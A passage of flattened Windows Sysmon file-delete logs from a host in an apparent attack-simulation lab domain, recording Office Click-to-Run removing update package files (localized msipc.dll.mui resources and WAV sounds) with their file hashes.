Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\th\msipc.dll.muiMD5=AABAC3BF02CD87DCF7958FD411E0DFCB,SHA256=910031CBBF1CD2DA257E1457915253FE12901FD2A5FACAC67CEDE28F03487734,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\sv\msipc.dll.muiMD5=2FB4BCD7A60322850311895029E9E8EE,SHA256=F085A5EE4F2BBB64B8ABAB8A34FA73529F929D13BE54F27E334C8590883480C8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\sr-Latn-RS\msipc.dll.muiMD5=65030948E9D2B3F5ECCCF7772EA6A001,SHA256=80EFC85E50247AA06E67E095C56EA9D54EC1455A3529D6BF45AA9F08EDDF89A6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\sr-Cyrl-RS\msipc.dll.muiMD5=A66DF56A9C60A7DB32365D77871122D9,SHA256=F1BB53210436D69E48A24A2FC224556D5ABC7A8427ACCC9915039D6B6D8B733E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\sr-Cyrl-BA\msipc.dll.muiMD5=53AD1DC8809750381E3AC3524AEE791C,SHA256=DA123A76BD218A03076A71477DD133150A896667566246E09811498EE3EF9DA8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\sl\msipc.dll.muiMD5=BBAAF6040130195C05737FE5AF6494BA,SHA256=4940717D479379A29B1F12F29F76635675E3A9314403E55A49EBE521BB2703D6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\sk\msipc.dll.muiMD5=784242988DE7EA700A8B94C537459BBF,SHA256=94A8A71380B04804B7E2B4860C17A2B292653A2D61F4E33F923FFC0DCFB02EE8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\ru\msipc.dll.muiMD5=763317E475AE3611E0D5279E93216213,SHA256=615057C8BC3845CD8003C7652774C666CF2BB1AD2DB60D0085BFDB0CED430058,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\ro\msipc.dll.muiMD5=BC22654444C8A61D48C8AE0A1D31F7AD,SHA256=70A94D431D5C2C9E7C632977EA181C24B0DFE517A34A9F7D83A2BDFF1FD8E728,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\pt-BR\msipc.dll.muiMD5=E58EA11B7A237775E2BF59EA76D1121F,SHA256=37345E5C300A6762E976CF6EB10CAA2631735E7AAE2D73F39BB8D1D4D30DA2E1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\pt\msipc.dll.muiMD5=1C59948EE99289FA58DB59A30ADD436D,SHA256=12E778EBEB471D3CE6278F34C6CF87A8120E13B1B1C52979444FB5E7F425C087,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\pl\msipc.dll.muiMD5=DCFA6AF1B503C9333E6C248C9CBC6A94,SHA256=146D386A643FCA4E81A60424DEED31B95C9C65B89354BF1747E88FF2B5AA2AF0,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\no\msipc.dll.muiMD5=CB5B89FFA34E4A0BF2EE5FC499795381,SHA256=167DE90E6F71EFE12761F89C4F1667B78226B7B2107B68125AD5E432A9AC87F0,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\nl\msipc.dll.muiMD5=8BA657EDF9F2D66A35D09C06F241539B,SHA256=25512444916F31F29F1677E6E9D163391A25A907468DAFCB2A62B55322CF5CDE,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\ms\msipc.dll.muiMD5=020A0ED255DB7353FBC9D62BBBCC3F39,SHA256=510A7D992BCB8C0044081CBBBF63CFFB9D82CB793FF580F45A590C8AEBE08950,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.861{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\lv\msipc.dll.muiMD5=5908FBE180EE30A3BAA19DDD9F4B853E,SHA256=AD171B92DB719B66F5CBFAE5B3CAC81A2DBEB29228324C09F25008648AE5F0B2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\lt\msipc.dll.muiMD5=CD86D3CFFF700AB3697268855517152E,SHA256=EE2E0226A21387913CE641864B27280361BBE0F1A8DC1BA84CBB00B0B3083C8A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\ko\msipc.dll.muiMD5=2D0E1AC77B17DFE6EB100CA2F4FB0FFF,SHA256=05BD184E2217EC00CDCF7007F10181A9E9BF55AAD2668EBF5B89975AFE8373C4,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\kk\msipc.dll.muiMD5=B56C6F13279F1A0D561DB49925B0B976,SHA256=AD7CBC1F3063390472FAAAE94BAFDCAE9805A7B2B6DE879B65BB31705013C0E5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\ja\msipc.dll.muiMD5=285C1BBC4248F84008418B675890FD9E,SHA256=514D48C572AAEDF9B52BC16CE4D7401A5301B64FD2583406088162AC4E56A48D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\it\msipc.dll.muiMD5=2E54061F6AD72A13C2F2690DE10A5857,SHA256=B06FC6E2A9B2F36627C854F806BA59BC04A7B9A7BB6EDF5EC8AE5AACC577650D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\id\msipc.dll.muiMD5=32C5D31D0319EB9264A757C48BCA6862,SHA256=8AD45C9D44A0AC5D4D135BD3171F46E8EB88DC757C2882B9332CC1A690A32E2B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\hu\msipc.dll.muiMD5=CC6C739A5F90452CBD8F7E4C36E6BD06,SHA256=AA0D2D775852769F833C422FB4831138432318D7D9642E88F77F4DF02B1BE4D2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\hr\msipc.dll.muiMD5=46DE4EBEDDDF4F4A083F4CF8B90BACC0,SHA256=50B6F584A2EAA71A41517731A8C05023D67CD1034A54405FB40BBF4AE5E78F2F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\hi\msipc.dll.muiMD5=84917FC1D557EEA6FB4E85C6917FD040,SHA256=44C22F6F5419A0FFE45EE4163D7A08AE08538F3EA037549DD113492F4164D167,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\he\msipc.dll.muiMD5=B5912F4AE0F384D4FCA0DF9AFBE451EA,SHA256=F762ECB254AA888F3FFD23B1F27C2B73F220480C520CBFFF761CEB3CFF5CCC19,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\gl\msipc.dll.muiMD5=F57DA27CC531AF6DBA608AED0C48CF26,SHA256=54302D8FA4535F4BC31BA1423D69F93CB0F76CA342874BCEAA7A0A1A36A00BB2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\fr\msipc.dll.muiMD5=4893F2E7A0B1B9705E462A721B89BDAF,SHA256=4DB3172A32D2B7927EADB92915F6253015BF9627D1DE5EEED57F32AD497D6373,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\fi\msipc.dll.muiMD5=C88A98E889AE2D1949CD40C9799E4E84,SHA256=43AD23BCBDC08AD2165FF2D10FB3379276FC9935782B10DFD3509D41872E2F74,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\eu\msipc.dll.muiMD5=D1BA7DF340A80D7F41E1A92B1E0A9D12,SHA256=0288564EBEBE3D5AC532533A27C48AF6EE39D3022AF3A631C1794AB5C1D36AC5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\et\msipc.dll.muiMD5=312AF19C6B9C6EEB488245702AE83316,SHA256=667A45DF5CF249083048C92BBD3A54CD3AE211A1DE719EBAE60B449BB17AAD08,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\es\msipc.dll.muiMD5=C0FD7661D3C7B0EF81138D1A7A0A2883,SHA256=6B23A3961BF947116028C75F06B1A73E30FE5BE319C33AD5DCAB4F7F82283D0E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\en-us\msipc.dll.muiMD5=1A92FB4532D9A7B8E136D50F80BC268C,SHA256=EBD3D1F65781B354B4498AAA7C9EEDA9A93CFB31AF0997F70CE560A914AAEAF8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\el\msipc.dll.muiMD5=341D0B6F61E8495C12B8FBF78879244F,SHA256=729879D3E88A3EDD2DA360C75BC1642EDBDEF497733C319589B04CEA74DE2DDF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\de\msipc.dll.muiMD5=FD3D87D37EFFADCF4565253B0FD426A7,SHA256=4D20BC6D109ABBE954ACBB6E5BB7C180E83F0F7DD58187CF9FF18DA2DAC93C4A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\da\msipc.dll.muiMD5=D306032BAB394D4E1FD5A700A3347CD0,SHA256=1D49CC7DE755DA0AEE5788A2A917FED1D8BD104E43564D6711521E01C623B59A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\cs\msipc.dll.muiMD5=A1D36266DF95592C596A6FEC35D536E9,SHA256=38B06DBA8FC931A73A2795374CB1B2A17A97D519F03C1D2446F345637C1053C4,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\ca\msipc.dll.muiMD5=35D7F583FC5FA1D98887241C90A1ECC2,SHA256=61A8A80A468D16A7EC5120A31D7084C75977EECBDAB68F1A5E58AD983C020E29,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\bg\msipc.dll.muiMD5=274DD34346EF5F145FD406DAAEDE6D02,SHA256=194046AE93B74FAE2EF6BAF812DDA2087D68A9439E21633B84C8128632EAC4BF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.814{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSIPC\ar\msipc.dll.muiMD5=C3BCC2A03289CFEBFC40AB1F8E2FB825,SHA256=A625A5E0B93560B7789BEEC60B6C689B9818B80D7ADD976B2B26E505F4D4F332,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000069218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\WIND.WAVMD5=687B9D00399F5D7FD38F1CA35DBB0681,SHA256=687689502EFF09DEC63EFE753B4B16A0B35F5852AB1F128840B9E46CF61425C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\WHOOSH.WAVMD5=14AE23ECA4848F6F00E7EEF5737E5F69,SHA256=F748469A6DC64C51AC2962E7058B54CBD90129FB4E993EB0DF54047EE65D2B0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\VOLTAGE.WAVMD5=D050433DC8545D178633A0F2DD218C77,SHA256=13576D767FE86E7F64FC5B8A0B46A21F2D856C47FCFFAEA4A7196770AD3EDAB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\TYPE.WAVMD5=7593E0E3EB61130AD19433753E8D1621,SHA256=350B39843228887509CDA2CFE5EF531EEEE5C09465843CD5E8510E50BD8A89AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Media\SUCTION.WAVMD5=E94900C685C5E77EF38F74FE653E0D10,SHA256=3053A05ACE86F945F1C8079DF4C35A76CFD7E56EC5305755F717AB05F1A478D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:21.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program 